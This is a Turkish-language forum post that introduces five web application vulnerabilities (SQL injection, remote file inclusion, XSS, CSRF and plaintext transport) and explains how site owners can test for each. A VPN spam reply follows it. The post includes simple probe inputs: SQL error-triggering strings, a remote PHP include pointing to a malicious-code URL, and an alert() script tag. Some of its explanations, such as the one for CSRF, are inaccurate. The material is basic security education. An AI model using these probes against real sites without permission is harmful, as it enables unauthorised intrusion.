Web Application Vulnerabilities

MrSynox

Owner
owner
Katılım
25 Nis 2021
Mesajlar
172
Reaction score
789
Puanları
93

Web Application Vulnerabilities

Web Application Zaafiyetleri


1. ENJEKSİYON SALDIRILARI
Enjeksiyon istismarlarıyla başlayorum çünkü Açık Web Uygulamaları Güvenlik Projesi'ne (OWASP) göre çoğu BT uzmanı, tehlikeler hakkında üstünkörü temel anlayışa sahip olsalar bile, çok fazla siteyi güvenlik açığına açık bırakıyor. Enjeksiyon, kullanıcı tarafından sağlanan kötü niyetli verileri bir tercümana iletmektir.
En yaygın biçim, bilgisayar korsanının veritabanınıza bir SQL komutu ilettiği SQL Enjeksiyonudur.


Uygulamanızda, bir veritabanına erişmek için kullanıcı tarafından sağlanan bilgileri kabul eden bir sayfa olmalı

Bir giriş formu, kayıt formu vb.. gibi yerlerdir

Veritabanı komutunun kullanıcı tarafından sağlanan bilgiyi bir WHERE cümlesine aldığını bilerek, komutu bir hata atacak SQL ile bitirmeye çalışın.
Dolayısıyla, giriş formumuzda, belki de bunu username ’ya da fake_column IS NULL’a eklemeyi denemek istiyoruz. Bir veritabanı hata mesajı sayfasıyla karşılaşırsan,Bu ENJEKSİYON Zaafiyeti'dir.

SQL enjeksiyonu yoluyla bir web sitesini nasıl hackleyeceğini öğrenmek İçin Konuyu okumaya devam et.




2. UZAK DOSYA İÇERİKLERİ
Siteniz herhangi bir PHP kullanmıyorsa, Bu tür saldırılara karşı güvendesiniz demektir.
Doğru kullanıldığında, PHP bir dizi farklı uygulama için çok güçlü ve kullanışlı bir araçtır.



İnclude () işlevini kullanan bir PHP betiği bulun. İçermede bir yol adınız varsa, onu mutlak URL eşdeğeriyle değiştirin. Dosya bu değişiklikten sonra hala çalışıyorsa, Bu UZAK DOSYA Zaafiyeti'dir.

Bu örnekte biraz daha çalışma yapması gerekebilir, ancak saldırı için yüzey alanını ciddi şekilde arttırır. Bir bilgisayar korsanının tek yapması gereken, işlemek için bir dosya bulmak ve satırı eklemek: dahil ("http://www.example.com/malicious_code.php") ve güvenliğiniz ihlal edilir. Uzlaşma, parola çalmayı, uzaktan kök kiti kurulumunu ve bazı durumlarda tam sistem güvenliğini ihlal etmeyi içerebilir.


3. SİTELER ARASI YAZMA (XSS)
En yaygın olarak XSS olarak bilinen Siteler Arası Komut Dosyası, bir web sitesi kötü niyetli kullanıcı girişi aldığında ve sorgusuz sualsiz girişi sayfalarına gönderdiğinde ortaya çıkar.
Bir web uygulamasının bunu yapmasının en yaygın nedeni, kullanıcı geri bildirimlerini almaktır: ürün incelemeleri, blog yorumları vb. Günümüzün İnternet kullanıcısı tartışmalar açabilir ve daha fazla web sitesiyle etkileşim kurabilir.

İki tür XSS saldırısı vardır.

Kalıcı Saldırı (Bu, veritabanında kalan ve daha sonra istediğiniz zaman erişebileceğiniz saldırıdır.)
Kalıcı Olmayan Saldırı (Bu, uygulamayı kapattığınızda üstesinden gelen tek seferlik bir saldırıdır.)



Uygulamanızda, kullanıcı girişini alan ve bunu doğrudan bir web sayfasına veren bir sayfa arayın.
Örnekler:

- Forumlar
- Yorumlar
-Arama butonları
vb..


Kod
<script>alert(123);</script>


Komut dosyası çalışıyorsa, bu, XSS'ye karşı savunmasız olduğu ve kolayca saldırıya uğrayabileceği anlamına geliyor.



Buradaki risk hem siz hem de ziyaretçileriniz içindir.




4. SİTELER ARASI İSTEK HATALARI (CSRF)
Bir CSRF saldırısında, oturum açmış bir kullanıcının kimlik bilgilerini ele geçirmek için siteler arası bir komut dosyası kullanır.

XSS için risk altındaysanız, bir CSRF saldırısı riski altında olabilirsiniz.


Uygulamanız, sitenizdeki kullanıcılara izin vermek için oturum çerezleri gibi kimlik bilgileri kullanıyor mu?
Sitenizde oturum açmak için "beni hatırla" özelliği varsa ve yukarıdan XSS saldırılarına karşı savunmasız olduğunuzu biliyorsanız, o zaman Bu SİTELER ARASI İSTEK HATALARI (CSRF) Zaafiyeti'dir.

Bu Güvenlik Açığında
kullanıcının sitede "moderatör" veya "yönetici" ayrıcalıklarına sahip olması durumunda ek riskler vardır ve bu da tüm site güvenliğinin ihlal edilmesiyle sona erer.


5. GÜVENLİ OLMAYAN İLETİŞİM
Belki de kitaptaki en eski numaralardan biri, site operatörleri ve ziyaretçiler genellikle güvenli olmayan bir protokol üzerinden iletilen her şeyin (FTP ve HTTP dahil) düz metin olduğunu, yani kullanıcı adlarının, şifrelerin, özel mesajların ve hatta **YASAK** bilgilerinin uygun araçlara sahip bir bilgisayar korsanı bulmak. Kötü niyetli bir kullanıcı kaynak ile hedef arasında gönderilen paketleri "izleme " Namı değer "ortadaki adam" saldırısı gerçekleşir.


Sitenizde bir formu , kullanıcı bilgileri site ziyaretçisine görüntülendiği bir sayfaya gidin
Bu HTTPS aracılığıyla mı oluyor?
Eğer Cevabın Hayır ise bu bilgi ele geçirilebilir.
Güvenli olmayan bir FTP bağlantı noktası için oturum açma kimlik bilgileriniz, veritabanınız veya diğer güvenli sistemler ile aynı mı?
Hassas dosyaları güvenli olmayan FTP üzerinden mi yüklüyor veya indiriyorsunuz?
O zaman Bu GÜVENLİ OLMAYAN İLETİŞİM Zaafiyeti'dir.
 
Katılım
14 Ağu 2025
Mesajlar
1,725
Reaction score
0
Puanları
36
Stay secure and private online with mozilla vpn advanced protection. Whether you're using public Wi-Fi or accessing geo-blocked content.
 
Üst